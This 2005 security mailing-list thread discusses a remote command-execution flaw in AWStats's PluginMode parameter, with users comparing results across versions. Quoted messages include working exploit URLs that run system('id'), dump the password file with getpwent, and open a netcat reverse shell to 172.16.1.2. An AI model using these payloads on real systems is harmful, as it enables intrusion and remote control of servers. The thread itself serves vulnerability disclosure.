Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?

Jeffrey Wilkinson <jwilkins@xxxxxxxxxx> · Tue, 15 Feb 2005 17:19:35 -0500 (EST)

Nonetheless, each of these causes AWstats to disclose the full path to the
AWstats installation, regardless if *nix or Windows.  That alone is enough
for concern.

At 08:52 PM 2/15/2005 +0100, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>It seems this bug works only on my server, i dont know why
>
>/awstats.pl?&PluginMode=:print+system('id')+;
>
>reply:
>
>uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
>Error:
>
>Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
>permissions) may be wrong.
>Check config file, permissions and AWStats documentation (in 'docs'
>directory).
>
>
>awstats: Advanced Web Statistics 6.1 (build 1.751)  (original)
>perl: This is perl, v5.8.5 built for i586-linux
>os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
>unknown GNU/Linux
>
>Ondra
>
>
>Jamie Pratt wrote:
>| So what are the conditions of this bug/vuln?  I can't reproduce this on
>| several 6.3 installs..:
>|
>| awstats 6.3 from source:
>|
>| request:
>|
>|
>http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('i
d')+;
>
>|
>|
>| output:
>| ****************
>| Error: Can't locate object method "BuildFullHTMLOutput_print" via
>| package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
>| line 1.
>|
>| Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
>| permissions) may be wrong.
>| Check config file, permissions and AWStats documentation (in 'docs'
>| directory).
>| ***************
>|
>| regards,
>| jamie
>|
>| Ondra Holecek wrote:
>|
>|>
>|>
>|> GHC@xxxxxxxxxxxxxxxxxxxxx wrote:
>|> |
>|> | /*==========================================*/
>|> | // GHC -> AWStats <- ADVISORY
>|> | \\ PRODUCT: AWStats
>|> | // VERSION: <= 6.3
>|> | \\ URL: http://awstats.sourceforge.net/
>|> | // VULNERABILITY CLASS: Multiple vulnerabilities
>|> | \\ RISK: high
>|> | /*==========================================*/
>|>
>|> [...]
>|>
>|> |
>|> | PluginMode=:print+getpwent
>|> |
>|> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>|> | This will satisfy eval() requirements., and :print getpwent() is
>|> executed.
>|> |
>|> |
>|>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+get
pwent
>
>|>
>|> |
>|> | Sanitazing limits user's input, but there is no filtration for call
>|> sympols '()'.
>|>
>|> no, user is not limited, he can execute ANY command if he add ; at the
>|> end of the command, try this
>|>
>|> awstats.pl?&PluginMode=:print+system('id')+;
>|>
>|> or even this
>|>
>|> awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
>|>
>|>
>|> Ondra
>|
>|
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.0 (FreeBSD)
>
>iD8DBQFCElLofz/hUj18TqkRAvX8AJ9s8OtsQn0T29kcU6vFeaaNPcTmTgCfYv3b
>iFO82NXxa0+IlKeG0Yxd8o0=
>=FWuW
>-----END PGP SIGNATURE-----
>
>